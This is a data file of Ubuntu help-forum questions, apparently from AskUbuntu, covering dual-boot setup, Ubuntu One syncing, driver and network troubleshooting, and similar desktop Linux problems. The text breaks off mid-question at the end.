46861	how can i highlight paragraphs in emails and add private notes to them ?	i would like to highlight parts of emails , without having to print them out and use a highlighter pen . i also want to add notes . i ideally want to see the highlights appear when i view an email a second time , so simply forwarding the email to myself and adding let 's say a line of stars is not ideal - i 'm looking for something more convenient . i know how to do this with pdfs and web pages , but what about emails ? i am willing to consider using whichever software or email client will let me do this on linux .
46863	how do i remove windows 7 from my dual boot system with ubuntu ?	hello can someone give me short tutorial how to : remove windows 7 from my dual boot system ( ubuntu/windows7 ) let me use free space as new partition for data ( so i dont need to extend ubuntu itself here ) remove windows 7 option from boot screen thanks update : thanx to lekensteyn answer i succesfully deleted windows . now i created new partition ( formatted to ext4 ) , but i can not use it . i can not copy files there , only as root . also when booting , ubuntu complains it did n't find /windows partition ( of course it did n't , i removed it ) . i feel like i should update some tables or what , any ideas ?
46864	can not write in greek	i 've recently installed ubuntu 11.04 , which i 'm unfamiliar with . i think the language package is installed correctly but there is no layout switching by using alt+shift combination . tried to look for a solution . have not found any instructions that work . please help
46871	how can i play videos in a framebuffer ?	if i do n't want to install a gui , just install a minimal ubuntu amd64 . ok , but : i heard that i can still run e.g . : firefox in a `` framebuffer '' ( ? ) , so i 'm asking , that how can i run e.g . : a vlc media player through a framebuffer under console , without `` gui '' ?
46874	unlink stopping ubuntu one sync	for some reason , something has gone wrong with my ubuntu one sync . it seems that it is trying to unlink some files but it has hung . restarting and uninstalling ubuntu one has not worked . praveen @ praveen-laptop : ~ $ u1sdtool -- waiting unlink ( running=false , share_id= '' , node_id='5150ec2c-493e-4ba3-a732-72270f1a9d55 ' , path='/home/praveen/ubuntu one/nyan cat [ original ] .mp3 ' , is_dir= '' , parent_id='047ae1e8-23ba-43ab-981c-8a457f62e9cb ' ) unlink ( running=false , share_id= '' , node_id='73b97063-efc9-4c07-b04f-75484f9a1ec7 ' , path='/home/praveen/ubuntu one/x-men first class movie tickets.pdf ' , is_dir= '' , parent_id='047ae1e8-23ba-43ab-981c-8a457f62e9cb ' ) unlink ( running=false , share_id='56c92c0f-a5ae-4960-a5a6-61252ba2acd0 ' , node_id='81ed5764-079e-4f95-961d-03bbd79fc08e ' , path='/home/praveen/documents/praveen.xhb ' , is_dir= '' , parent_id='a77f80bb-54a9-4cc8-8062-81dea00a9d4f ' )
46876	errors on hard drive : should i do anything about these ?	i 've just recently started to get errors when starting up , which vanish from the screen too quickly for me to note down , lots of disk activity during normal use for no readily apparent reason . i have studied other questions on this site and so used sudo smartctl -a /dev/sda and the results include several instances like this ... error 979 occurred at disk power-on lifetime : 12516 hours ( 521 days + 12 hours ) when the command that caused the error occurred , the device was active or idle . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 00 9f 06 1e 40 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 60 08 00 9f 06 1e 08 08 01:14:02.225 read fpdma queued ef 10 02 00 00 00 00 08 01:14:02.225 set features [ reserved for serial ata ] 27 00 00 00 00 00 00 08 01:14:02.225 read native max address ext ec 00 00 00 00 00 00 08 01:14:02.224 identify device ef 03 46 00 00 00 00 08 01:14:02.224 set features [ set transfer mode ] the disk utility is showing a warning for `` current pending sector count '' does all this amount to grounds for suspecting a failing hard drive . the machine has been running very slowly ( to the extent that editing this question is difficult ) since this started so i 'm sure there 's something wrong somewhere . i 'm running 10.04 on an acer extensa 4220 , btw .
46878	parallel installation of ubuntu , wubi and windows 7 ?	i have windows 7 installed on a notebook . because i wanted to experiment with ubuntu without loosing my windows 7 configuration i installed the wubi version of ubuntu inside of windows 7 . since things seam to work out well with ubuntu and my harddisk space is very limited , i want to make ubuntu my only operating system on this machine . so my question is : is it possible , to install ubuntu 11.04 additionally to my actual configuration ( wubi and windows 7 ) ? and if things turned out well with the native installation of ubuntu , too , to delete wubi and windows 7 from my system afterwards ? why i am asking this is simply , that i am afraid , that if i just format my machine and made the whole harddisk available for the fresh ubuntu installation , it could be possible , that it turns out , that one thing or an other would not work properly , like it did in wubi . ( possible network , vpn , and firewall @ work issues ) in this case i 'd like the possibility to switch back .
46883	apps run as root appearing like win 98 style after installation of gnome 3	i installed gnome 3 using ricotz 's ppa . then all windows using sudo and gksu is looking like its running under windows 98 . system specs : intel core 2 duo nvidia 6200 ubuntu 11.04 i also installed the adwance theme .
46885	how many usb hard drives can be plugged into a laptop using a port replicator ?	i 've got a laptop with 2 usb 2.0 and 1 usb 3.0 ports and i would like to know how many usb hard drives i could plug into it . is there a hard limit in the linux kernel ? on the performance side , what is the speed shared across the drives plugged into the port ?
46886	how to create a bootable usb stick to flash a bios ?	i want to upgrade the bios on an intel motherboard using a program called iflash2.exe , provided by intel , which runs only on ms-dos . i do not have windows operating system , and i am trying to create a bootable usb stick that will contain ms-dos , iflash2.exe , and related files . i tried a program called unetbootin , which created a bootable usb with freedos , but i do not know how and where to add iflash2.exe and related files . can you tell me how i can do that ?
46887	apache2 silently does not start with mod_ssl enabled after upgrade to 10.04	we 've just upgraded a machine from 8.04 to 10.04 ( yes , long over due ) but since the upgrade apache2 will not start . nothing shows in the error logs , not in apache 's error.log , no console output , nothing in syslog . we 've already narrowed it down to mod_ssl . if i disable mod_ssl ( a2dismod ssl ) , apache starts fine . re-enable the module and the problem returns . while debugging , i 've already tried using the ssl.conf.dpkg-dist clean configuration file to make sure the problem is n't with an incompatibility in our ssl-config , but this does not change anything . edit : update : i took the easy way out and switched to mod_gnutls , so it 's no longer that big of a deal . still curious as to what it may have been , so if you have a possible cause , please do post it .
46889	how to work around doing auth dance loop	this seems to be an old problem ( back in jaunty/karmic ... ? ) that i am now experiencing for the first time on natty . ubuntuone tries to login , reaches a standoff , and times out . after a wait , it tries again . using u1sdtool -quit , etc , does not help , neither does restarting the computer . any suggestions ? the service is truly great - when it works .
46891	ubuntu one stop syncing after software center logging in with another identity	i use u1 on ubuntu 11.04 with no problems until today . for the first time , i used software center 's rating function and give 5 stars to my favourite paint application . i need to login before doing that , and i choose the email address used for my launchpad account ( el.cameleon.1 @ ... ) , which is dedicated to my activity on internet ( forum , bugzilla , mailing list , ... ) . however , for my ubuntuone account , i use another email address ( my private one ) . i am not sure if it related , but i guess that login with my launchpad account disconnect me from u1 , because now i have a message that tell me that i am not connected and to check my connection to the internet ( which is fine , thanks ) . any idea ? how can i log off in order to identify again into u1 ? is it possibile to use one launchpad account for softwarecenter rating and another one for ubuntuone ?
46896	photos not ordered when selecting events or tags	shotwell rocks ! congrats to yorba and his team . i have a small issue with shotwell 0.9.3 . when selecting specific `` events '' or `` tags '' ( in the left bar ) , the photo 's appearing in the main window do correspond with the selection but are no longer ordered in accordance with the order selected in `` view '' , `` sort photos '' . this can be confusing . for obtaining the visualisation of the photo 's in the desired order , i need to change ( `` view '' , `` sort photos '' , ... ) the order ( into an undesired order ) and then immediately reselect the original ( desired ) order . i suppose that after selecting a `` tag '' , the shotwell code may have to automatically launch an ordering instance .
46903	how can i make my command history start counting from 0	if i type the following : history -c history i get 1110 history . why does clearing the command history not reset the counting to 1 and how can i reset the count ? note : it is resetting the number , just not to 1 . if i type 5 commands , the number changes to 1114 but history -c only resets it to 1110 .
46904	tool to create ppt templates ?	i am very interested to learn creating templates for power point presentations . could someone tell me if there is any other nice tool available for ubuntu for creating high quality ppt templates ? ( other than libreoffice ) .
46905	make bat file available everywhere for the terminal ?	i have a bat file that i want to be able to call from everywhere , by simply calling it 's name . in windows i simply had to add the folder where the .bat file is located , to the windows path . i have no idea how to do this in ubuntu though . i 'm guessing there 's something similar.. can someone explain how to do this .
46908	mdadm array help	i was running ubuntu 11.04 and my boot drive has become corrupt . this has stopped me from accessing my raid5 array . the array was set up in mdadm and called md0 i think . can i install ubuntu 11.04 on a new os drive and pull back my array ? if so what would i need to do ? are there any important config files on the old drive ? i think part of the var directory is unreadable .
46910	set and save iptable rules forver !	i 'd like to set and save forever this iptables rule , but i do n't how i can do : iptables -i input -p icmp -- icmp-type 8 -j drop this rule is very useful because it blocks ping requests and my pc is stealth on internet ( i 've tested it on grc , but unfortunately i have to active that rule everytime i connect my computer to internet by mobile : is it possible to save it forever ? so everytime i do n't have to active it manually . thanks a lot . ps : i use firestarter to configure iptables .
46917	what is the purpose of alt-f4 ?	i used to close a running application by pressing alt+f4 . but , i realised that the application is still running and the correct way to close ( quit ) it is the combination of ctrl+q keys . so , what is the purpose of alt+f4 and how is it different from ctrl+q ?
46925	problem with ubuntu one ( syncing )	i have ubuntu 11.04 installed on my computer . the other day i learned about ubuntu one and signed up for the service . i placed a couple of files into my ubuntu one folder and they were loaded to the web ( which i logged into and saw ) . i then created a folder , placed a couple of files into it and marked the folder to sychronize with ubuntu one . this worked as well . however , as of last night the syncing has stopped working . i have placed a couple of new files into the folder and i periodically get a small window at the top right of my screen saying that the file x is being uploaded to my personal cloud . the message eventually goes away , but the file is never actually uploaded . so , it did initially seem to work but is n't now . last night i thought i saw a message on the ubuntu one website saying that the system was down for maintenance - i ca n't find that message again today . the only other thing that happened last night was that at one point i received a popup window asking me to supply login information for amazon s3 . although it did n't seem right , i put my ubuntu one user id and password into this window and told it to remember it . any suggestions greatly appreciated . thanks .
46928	how to become a power user of gnome-do ?	just a few months back , i discovered gnome-do . i have heard that its a great tool for ubuntu . however , i have n't been able to use it except for starting/running applications like firefox , thunderbird , gedit etc . it would be great if people can list all the great things that i can do with this nice tool .
46929	selecting classic mode on login still shows launcher	i was running unity in natty when i tried to activate the rotate and cube effects . that broke unity and i had to restore the unity original configuration by invoking gsettings reset com.canonical.unity.launcher favorites and unity -- reset i have now got back unity and re-tweaked it , but something i did in between now gives me the launcher on the left side when i choose ubuntu classic instead of ubuntu when i log in . i seem to be in a hybrid state where i can get use of both the traditional ( gnome 2 ? ) functionality and also unity . how can i restore the ubuntu classic interface to its original non-hybrid state ? thanks .
46930	how can i set up password-less ssh login ?	i want to be able to login to a remote via ssh without having to enter the password all the time . how do i set it up ? is a different command required to execute a password-less session ?
46931	shortcut key for rubbish bin	in the launcher , the rubbish bin is given the shortcut super+t . i assume this is because it was named 'trash can ' or something in the original language . i just wondered if there is any way of changing the letter of this shortcut because it 's something that 's mildly annoying to me . i 'd rather have super+t open a terminal like i had in 10.10 .
46937	ubuntu software center does not start on 10.10 , can not upgrade to 11.04	softwre center does not start on my 10.10.it used to work before . i noticed this recently . on clicking ubuntu software center in the applications menu , i can see the starting ubuntu software center button in the taskbar , which disappears after a while , but the software center does not appear . i can not install deb files using software center either , since the same thing happens ( using gdebi to install deb files now ) . on running software-center from terminal , i get the following . $ software-center 2011-06-04 23:01:25,084 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/share/software-center/softwarecenter/view/widgets/mkit_themes.py ' , 675 , 'retrieve ' ) ' 2011-06-04 23:01:25,083 - root - warning - no styling hints for wasp-murrine were found ... using human hints . ( software-center:7715 ) : glib-gio-critical ** : g_loadable_icon_load : assertion `g_is_loadable_icon ( icon ) ' failed ( software-center:7715 ) : glib-gio-critical ** : g_loadable_icon_load : assertion `g_is_loadable_icon ( icon ) ' failed traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 90 , in < module > app = softwarecenterapp ( datadir , xapian_base_path , options , args ) file `` /usr/share/software-center/softwarecenter/app.py '' , line 312 , in __init__ self.view_switcher = viewswitcher ( self.view_manager , datadir , self.db , self.cache , self.icons ) file `` /usr/share/software-center/softwarecenter/view/viewswitcher.py '' , line 59 , in __init__ store = viewswitcherlist ( view_manager , datadir , db , cache , icons ) file `` /usr/share/software-center/softwarecenter/view/viewswitcher.py '' , line 321 , in __init__ self._update_channel_list ( ) file `` /usr/share/software-center/softwarecenter/view/viewswitcher.py '' , line 398 , in _update_channel_list self._update_channel_list_available_view ( ) file `` /usr/share/software-center/softwarecenter/view/viewswitcher.py '' , line 420 , in _update_channel_list_available_view for channel in self.channel_manager.channels : file `` /usr/share/software-center/softwarecenter/backend/channel.py '' , line 65 , in channels return self._get_channels ( ) file `` /usr/share/software-center/softwarecenter/backend/channel.py '' , line 279 , in _get_channels channel_query=for_purchase_query ) file `` /usr/share/software-center/softwarecenter/backend/channel.py '' , line 339 , in __init__ self._channel_icon = self._get_icon_for_channel ( channel_name , channel_origin , channel_component ) file `` /usr/share/software-center/softwarecenter/backend/channel.py '' , line 425 , in _get_icon_for_channel channel_icon = self._get_icon ( `` emblem-money '' ) file `` /usr/share/software-center/softwarecenter/backend/channel.py '' , line 458 , in _get_icon icon = animatedimage ( self.icons.load_icon ( icon_name , self.icon_size , 0 ) ) glib.gerror : failed to load icon i upgraded all the packges using update manager to the latest ones . i reinstalled software-center from synaptic . still no luck . how do i go about resolving this ? and i do n't know if this is related , but upgrading 10.10 to 11.04 using the alternative iso fails with the following error . could not mark ubuntu-desktop for upgrade . last part of apt.log file , which mentions both software-center and ubuntu-desktop investigating ( 7 ) software-center [ i386 ] < 3.0.8 - > 4.0 > ( gnome ) broken software-center : i386 depends on python-webkit [ i386 ] < 1.1.8-0ubuntu2 - > 1.1.8-1ubuntu2 > ( python ) considering python-webkit : i386 10000 as a solution to software-center : i386 10000 removing software-center : i386 rather than change python-webkit : i386 investigating ( 7 ) libnspr4-0d [ i386 ] < 4.8.6-0ubuntu1 > ( libs ) broken libnspr4-0d : i386 conflicts on libnspr4 [ i386 ] < none - > 4.8.7-0ubuntu1 > ( libs ) ( < 2:4 ) considering libnspr4 : i386 10000 as a solution to libnspr4-0d : i386 10000 removing libnspr4-0d : i386 rather than change libnspr4 : i386 investigating ( 8 ) ubuntu-desktop [ i386 ] < 1.207 - > 1.220 > ( metapackages ) broken ubuntu-desktop : i386 depends on software-center [ i386 ] < 3.0.8 - > 4.0 > ( gnome ) considering software-center : i386 10000 as a solution to ubuntu-desktop : i386 10000 considering software-center : i386 10000 as a solution to ubuntu-desktop : i386 10000 investigating ( 8 ) xulrunner-1.9.2 [ i386 ] < 1.9.2.17+build3+nobinonly-0ubuntu0.10.10.1 > ( devel ) broken xulrunner-1.9.2 : i386 depends on libnspr4-0d [ i386 ] < 4.8.6-0ubuntu1 > ( libs ) ( > = 4.7.3-0ubuntu1~ ) considering libnspr4-0d : i386 10000 as a solution to xulrunner-1.9.2 : i386 10000 removing xulrunner-1.9.2 : i386 rather than change libnspr4-0d : i386 investigating ( 9 ) ubuntu-desktop [ i386 ] < 1.207 - > 1.220 > ( metapackages ) broken ubuntu-desktop : i386 depends on software-center [ i386 ] < 3.0.8 - > 4.0 > ( gnome ) considering software-center : i386 10000 as a solution to ubuntu-desktop : i386 10000 considering software-center : i386 10000 as a solution to ubuntu-desktop : i386 10000 investigating ( 9 ) yelp [ i386 ] < 2.30.1-0ubuntu1 - > 3.0.0-0ubuntu2 > ( gnome ) broken yelp : i386 depends on xulrunner-1.9.2 [ i386 ] < 1.9.2.17+build3+nobinonly-0ubuntu0.10.10.1 > ( devel ) considering xulrunner-1.9.2 : i386 10000 as a solution to yelp : i386 10000 removing yelp : i386 rather than change xulrunner-1.9.2 : i386 done
46942	how do i stop my ethernet network connection from dropping ?	my ethernet-based network connection does n't stay up consistently . i 'm running a ping against the gateway and it will : work for a minute freeze , time out , or give multi-second response times repeat if it 's stuck and i disable/enable networking through the network manager applet everything will work fine again for a minute . after 280 packets transmitted i 'm getting 41 % packet loss . i 've tried a different cable and connection to the gateway but this had no effect . the distance to the gateway is just about 3 feet . seems to work fine if i switch over to windows , but ubuntu is my main os and i ca n't even use it right now as i depend on the network . my setup ... os : ubuntu 11.04 , dual-booting windows 7 mobo : gigabyte z68x-ud4-b3 cpu : intel core i7 2600k edit a little clarification ... network manager is still showing me as connected , but i am unable to reach to gateway or anything beyond . at no point does nm suggest the connection is lost and calling ifconfig shows that i still have an ip address . i tried connecting to a different gateway with a different cable and the same problem arises . as requested : lspci | grep -i eth 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) dmesg | tail -f [ 14.024709 ] ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro , commit=0 [ 14.026443 ] ext4-fs ( sda7 ) : re-mounted . opts : commit=0 [ 14.176101 ] hda-intel : irq timing workaround is activated for card # 2 . suggest a bigger bdl_pos_adj . [ 23.917731 ] eth0 : no ipv6 routers present [ 726.109697 ] r8169 0000:07:00.0 : eth0 : link up [ 733.169494 ] r8169 0000:07:00.0 : eth0 : link up [ 753.930119 ] r8169 0000:07:00.0 : eth0 : link up [ 880.787332 ] r8169 0000:07:00.0 : eth0 : link up [ 1159.161283 ] r8169 0000:07:00.0 : eth0 : link up [ 1406.623550 ] r8169 0000:07:00.0 : eth0 : link up edit @ roland-taylor : network is always available under windows . pings do not timeout , applications do not complain of no network availability , large downloads are not interrupted or slowed .
46946	is there a program for vectorial house plans \ sketches ?	i 'm trying to plan my new garden , and want to sketch it professionally - with dimensions of every element in it . is there an ubuntu program for sketching house plans with vectorial elements , like those in the picture above ?
46952	difficulty w/ .desktop file permissions in dock customization	i am trying to edit the .desktop files for my docked apps such as : ~/.local/share/applications/libreoffice-startcenter.desktop however , i ca n't get permission for to edit the file . how do i change these permissions ?
46953	how can i add commands to startup requiring admin privileges ?	i want add commands to my startup list that needs admin privileges , how do i go about it ? obviously there 's no chance of me typing in the password when the computer is starting up . note at this time , i wo n't be able to verify if any of the answers would actually work , so i 'd appreciate if someone can provide a solution that has actually worked in practice .
46957	how do i set up an opera web kiosk ?	is there a way to setup a web kiosk that uses the opera browser , and is self resetting so that there is n't any chance that someone could hijack it ?
46960	gnome3 - mixed old and new look	why do various application bars like the menu bar look obsolote in natty+gnome 3 compared with fedora ? see the difference between window panels in f15 gnome here and a screenshot from my desktop : while the main interface is quite similar in both the os .
46964	what to do with a cluster of old computers running ubuntu ?	at our university , our section had a grant of several old p4 computers . we decided on using them to create a 3x3 grid , which would function as a medium for our off-hand processing work . however , as of now , this is all we have done : this is a video streaming running in 9 parts using vlc/ssh scripts to manage it . as of now all the computers are connected to a single network , and managed using ssh key based authentication . i would love to hear some innovative ideas . some hardware details are provided : 1gb ram , intel pentium 4 2.4 ghz , 40gb hdd running lucid particularly , i was thinking about the 40gb portion being used as a cloud-based storage space for people . something along the lines of sparkleshare or owncloud but they do n't seem to offer multiple computer based network . if there is someway to harness the computing ability of this grid , i would also like to hear about it .
46965	how do i upgrade from 8.04 to 8.10 ?	i have ubuntu 8.04 and i am trying to use `` update manager '' to upgrade to 8.10 . the upgrade fails because of some problem related to network/internet setting . the error i get is discussed and a solution by hyperion is posted at : https : //answers.launchpad.net/ubuntu/+question/50648 hyperion is referring to the settings in system -- > preferences -- > network proxy i have the option `` direct internet connection '' selected . hyperion says that ubuntu will upgrade if i choose `` manual proxy configuration '' . the problem with this option is that i would have to fill in a lot of details like http proxy , secure http proxy , port ( 8080 ? ) and i dont know any of this . i have a at & t dsl line for my internet . i tried putting the gateway address for http proxy , but it does not work . can anyone help me to get around this issue ?
46967	how to preload programs ?	what i want to do is open some programs in the boot sequence so ubuntu loads them into memory . i 'm already using the preload package and it 's not helping in that part . thanks .
46968	setting up dual monitors	hi , i have a spare nvidia graphics card i would like to use towards a dual monitor set up but the gpu in my pc is an ati , would it cause issues if these were installed side by side ? also am i correct in assuming i need two cards for a dual set up ? i am using pinguy 11.04 .
46969	can an upgrade problem with kubuntu 11.04 be fixed without reinstalling ?	i finally gave in to regular upgrade request pop-ups on my kubuntu 10.10 installation . the upgrade was quite fast ( a little more than 1 hour ) . it gave me a warning that something went wrong ( exit code 1 ) and i noticed at least two most annoying problems : all my attempts to add an additional keyboard layout had no effect at all . ( i had done that in previous versions with no problem at all . ) when i click an icon of an application on the panel it will no longer start the application but give instead the whole menu to choose one from . is there a way to to at least investigate these problems without reinstalling from scratch ?
46976	ati catalyst control center gives error ( radeon hd 6470m )	important note : radeon hd 6xxx cards are not currently supported . to avoid a wrong purchase ( like i did ) be aware of this . also read switchable_graphic_chips_warning . the issue is summarized in the subject of this post , when on my laptop i click system > preferences ati catalyst control center i get this message : initialization error : there was a problem initializing catalyst control center linux edition . it could be caused by the following . no ati graphics driver is installed , or the ati driver is not functioning properly . please install the ati driver appropriate for you ati hardware , or configure using aticonfig . some detail about environment : $ lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 01:00.0 vga compatible controller [ 0300 ] : ati technologies inc ni seymour [ amd radeon hd 6470m ] [ 1002:6760 ] installed packages : ii fglrx 2:8.840-0ubuntu4 ii fglrx-amdcccle 2:8.840-0ubuntu4 ii xserver-xorg-video-radeon 1:6.14.0-0ubuntu4 i have installed ati proprietary driver using `` additional drivers '' and jockey says that the driver is activated and currently in use . after driver installation i 'm able to use a resolution of 1366x768 . i 'm using classic interface ( no unity ) . additional info/oddities : $ glxgears segmentation fault hardware excerpts : description : notebook product : hp pavilion dv6 dv6-6008el notebook pc width : 64 bits cpu : 4 x intel ( r ) core ( tm ) i7-2630qm cpu @ 2.00ghz please , let me know if i can provide further details to solve the issue . thanks .
46977	can i bind the unity dock to the caps lock key ?	so i really , really do n't want to have to un-learn all of my `` win/super '' key bindings . and it occurred to me : there is one key on the keyboard that i never use : caps lock . can i make caps lock do what super does by default ? note : i do not want to simply map caps lock to super , because that would defeat the purpose of giving them two separate functions .
46984	ethernet does n't work after completing a network install ?	my laptop ( dell latitude pp01l ) was running ubuntu 10.10 32 just fine ( installed from cd worked right away ) but it 's cd drive was getting flaky . after making a mistake i decided i just wanted to reinstall so i installed ubuntu 10.10 over the network ethernet boot . after finishing everything works except networking . ethernet port is dead and wireless can not see anything . however when i was able to boot from cd these devices worked just fine . any idea what is causing this ? i tried installing over network boot a new install of 10.10 and then ubuntu 10.4 and exact same thing .
46990	how do i remap the buttons on an apple mighty mouse ?	i just started using ubuntu instead of windows , my initial reaction was `` omg this is awful '' , but after a while it grew on me , and i do n't plan on going back to windows . however i have an apple mighty mouse which i was given today , and the buttons on it do n't quite work . left and right click work , so does scrolling right and down , also the back button works . however the forward button goes back , and the scroll up button sometimes scrolls down , scrolling left just does n't work . is there a way to fix this ? like remap the buttons ? i 'm not entirely sure how the driver thing works in ubuntu ?
46992	recommendation on buying an usb tv tuner ( analog or hybrid ) that will work ?	it seems that most pci tv tuner cards do have some support for linux . i 'm not sure though about the usb ones ( analog or hybrid ) . do you have any experience that you could share regarding usb tv tuners ( analog or hybrid ) under ubuntu ? i do n't want to buy some device and then find out it 's useless ( if it 's not working at all under ubuntu ) .
46994	how do we know the version of a tool from command line on a remote server ?	how can i know the version of texmaker running on a remote server ?
46995	can i remove the global menu and , instead , have it on each window ?	the title is the question . i need these characters to post .
46998	using word list to brute force encrypted partition	i used the disk utility to encrypt an external hdd about a month ago . now it seems that i have forgotten the password . i have formed it according to a set of rules , so i have generated a word list ( with a python script ) of ~400,000 candidates . i 'm pretty confident that my lost password is somewhere among these , but i do n't really feel like trying them all out by hand . so the question goes : is there any tool which would take my word list a try them automatically ? or if not , how should i go about writing a script like that ? i 've used a similar tool on gpg earlier , it 's called nasty . ( if someone is interested in my extremely simple permutation script , it can be found on pastebin . )
47005	how to execute query to a db from a terminal and store output to a file ?	i want to access this db and i use this to access the sqlite db : sqlite3 .mozilla/firefox/profile_name/places.sqlite the query that i want to execute to this db and store the output in a text file is select moz_places.url from moz_places how do i do that ?
47008	how do you disable launcher without disabling global menus in 11.04 ?	how do you disable the launcher without disabling the global menus too in 11.04 ? i want to use docky instead of launcher . thanks .
47016	how can i upgrade to python 2.7	i am on ubuntu 11.04 and have python 2.6 installed . i would like to upgrade to python 2.7 . how should i go about doing this ?
47017	5.1 usb headphones not recognized	i have a pair of 5.1 bluetooth headphones that connect to any pc via bluetooth or usb . for some reason my ubuntu 10.10 laptop wo n't read the headphones and wo n't even allow me to use them . the best it can do is charge them . any commands or tips to get them working ? thanks in advance . i 'm connecting them via usb since my laptop does n't use bluetooth .
47018	ubuntu one sync as a file backup solution ?	i was hoping to utilize ubuntu one and in particular , the syncing feature within ubuntu one to provide offsite backup for some of my files . my intention was to mark any of my folders that have important files as 'folders to synchronize ' to ubuntu one . it works great in that whenever an important file is placed in the folder , the file is copied up to ubuntu one ( hence creating a backup ) . however , if any of these important files are lost or accidently deleted from my computer then due to the synchronization it is also immediately deleted from ubuntu one . this approach does not work very well to provide backup . on one hand i really like the automatic way in which the synch feature will upload any of my important files to ubuntu one but on the other hand if i lose the file on my computer it will likely be taken off of the cloud as well ( via synchronization ) . what approach are others taking to backup their important files to ubuntu one ? i did n't want to have to manually upload my important files to ubuntu one and remember to upload other important files as they are created on my computer . your thoughts and suggestions are greatly appreciated .
47022	how to kill unity panel & unity launcher ?	i 'd like to find out which process is responsible for unity panel and launcher.. in case i 'd like to close one of them , which process to i have to kill ? thanks !
47023	unmountable disk error ( blue screen ) on booting to win xp	after installation of ubuntu 11.4 along with existing win xp as dual boot , i ca n't boot windows xp . on choosing windows xp from the boot menu , the windows xp initial screen appears and then it turns in to the blue screen with the error unmountable disk volume ( ) pl help me . saji
47024	how to setup samba as a domain controller ?	i would like to setup samba as a domain controller . can anyone help me with clear installation procedure and steps ? thanks in advance..
47025	gnome3 on ubuntu 11.04	hello i am trying to install gnome shell on ubuntu 11.04 but i have some issues : i followed this tutorial : http : //techhamlet.com/2011/05/how-to-install-gnome-3-on-ubuntu-11-04/ but when install was completed , my system crashed and i could not log in . the effects was crashed and i formated my system : ( can you help me please to install gnome 3 ?
47026	clicking twice on a launcher icon : why different behaviours ?	the usual behaviour when clicking twice on an icon in the unity launcher is to trigger the scale mode : all windows of that app are tiled . now , a third click triggers different kinds of behaviour : most of the time it does nothing , sometimes it exits scale mode , and sometimes ( not easily reproducible ) it shuffles windows around , so for instance if i have evolution open , and i am editing a message , clicking twice will show the message on the right and evolution on the left , and a third click will shift the message to the left , and evolution to the right . i was wondering what would cause these different behaviours , and is it possible to control them ( the second option is most useful , it would be nice for this to be consistent ) . bonus question : is there any purpose to shifting windows around as in the third behaviour , except to impress colleagues ?
47036	is mysql server installed by default ?	i have a fresh installation of ubuntu 11.04 . since i want to work with a mysql server on this machine i see , that if i enter mys in the terminal and hit tab it completes to mysql . but if i do mysql -u it says error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) i thought `` maybe i have to start the server first '' , so i tryed /etc/init.d/mysql unfortunately bash tells me bash : /etc/init.d/mysql : no such file or directory if i do locate mysql i get a whole bunch of directories and files with mysql in it . so it raises the question : is mysql pre-installed on ubuntu 11.04 or do i have to install it manually ? and if it is already installed , how do i configure/start the server , since the way i know how to start a mysql server on ubuntu /etc/init.d/mysql does n't seem to work ? i got the feeling that i miss something and i 'll be glad if someone could give me a hint . thanks ! !
47041	how to fix pink borders in gtk+ 3 ?	i have problem with standard gnome3 theme `` adwaita '' . how to fix it ?
47044	how do i export a chart in an image format from libreoffice calc ?	i want to print some charts from libreoffice calc , is there a way to do this ?
47045	tutorial on making use of logs	i know i can find logs in /var/log/ , they contain powerful information , but i do n't really use them often ( on desktop or server ) . is there any good guide to learn how to make use of system logs on ubuntu ? top things an user/basic admin needs to know ? e.g . check this log weekly keep this file clean set up log notification this way when somethings wired happened , start here use this tool to simplify your life common command line usages common uses of grep searching the logs or any other tips to new users coming from windows ?
47047	download accelerators for ubuntu	what are the download accelerators available for ubuntu ? i like prozilla , but could n't find a way to install it using apt or software center .
47048	how to make sure all internet traffic only goes througth vpn ?	i have a vpn connection and i want to make sure that all traffic use this vpn connection . i though of using iptables . ideas somebody ? ten x
47049	unity application button on docky ?	i 'm not really liking unity and i 'd prefer to use docky instead . but since there 's not really an application navigation menu in 11.04 , i need that application button on docky to be able to browse my installed programs . any idea how i place this in docky ? also , how should i remove the unity sidebar ? i only want to remove the quick launcher..
47055	how do i get apple remote to work ?	i have installed ubuntu 11.04 on my macbook and am trying to get the apple remote to work with it . does anyone have a set of instructions that will help me get it to work .
47062	what is terminal command that can show opengl version ?	so i want to find out which is my opengl version . i have access to ubuntu via ssh . which command shall i execute ?
47067	can i add wine application category list to unity dash ?	in the dropdown list of application categories wine is missing and so all wine applications are missing as well . how can i add wine applications to the application category ?
47068	access tomboy notes from windows	i have a dual boot system with windows 7/ubuntu 11.04 . is there any way i can access my notes from windows , even though they were created in ubuntu ? i sync my notes against ubuntu one , so the notes are accessible in the cloud as well as on my computer . read access is priority one , but if there is a possibility to add/edit notes from windows as well , that 'd be great .
47069	help to fix acpi on my hp pavilion dv6-6008el	update : further details related to the issue in this other question . i 'm able to boot my laptop only adding acpi=off as kernel parameter in grub configuration file . without this parameter the system simply hangs forever on ubuntu splash screen . hardware : hp pavilion dv6-6008el o.s . : ubuntu natty $ uname -a linux tk 2.6.38-8-generic # 42-ubuntu smp mon apr 11 03:31:24 utc 2011 x86_64 x86_64 x86_64 gnu/linux i 'd really do n't want to disable acpi support completely , as this generates annoying side effects like losing the ability to manage the power state of the laptop such as battery level , to cite one . btw , this dv6 model has dual graphics and if i understand correctly vga_switcheroo requires acpi to switch between integrated intel and composite ati . i tried to debug acpi using the official ubuntu guide but no luck , i still have to use acpi=off because less invasive options like acpi=ht , pci=noacpi , etc . do n't work . i have removed splash , quiet and acpi=off ( this way acpi is enabled ) from grub and the boot process stops at this point : [ cut ] * starting apparmor profiles * setting sensors limits * stopping system v initialisazion compatibility * starting system v runlevel compatibility * stopping automatic crash report generation * starting ecryptfs * starting restore sound card ( s ' ) mixer state ( s ) * starting acpi deemon * starting anac ( h ) ronistic cron * starting kernel messages * stopping ecryptfs * starting regular background program processing daemon * starting deferred execution scheduler ... * stopping save kernel messages if acpi=off the system stops here ... otherwise the mouse pointer appears and i can log in ( but 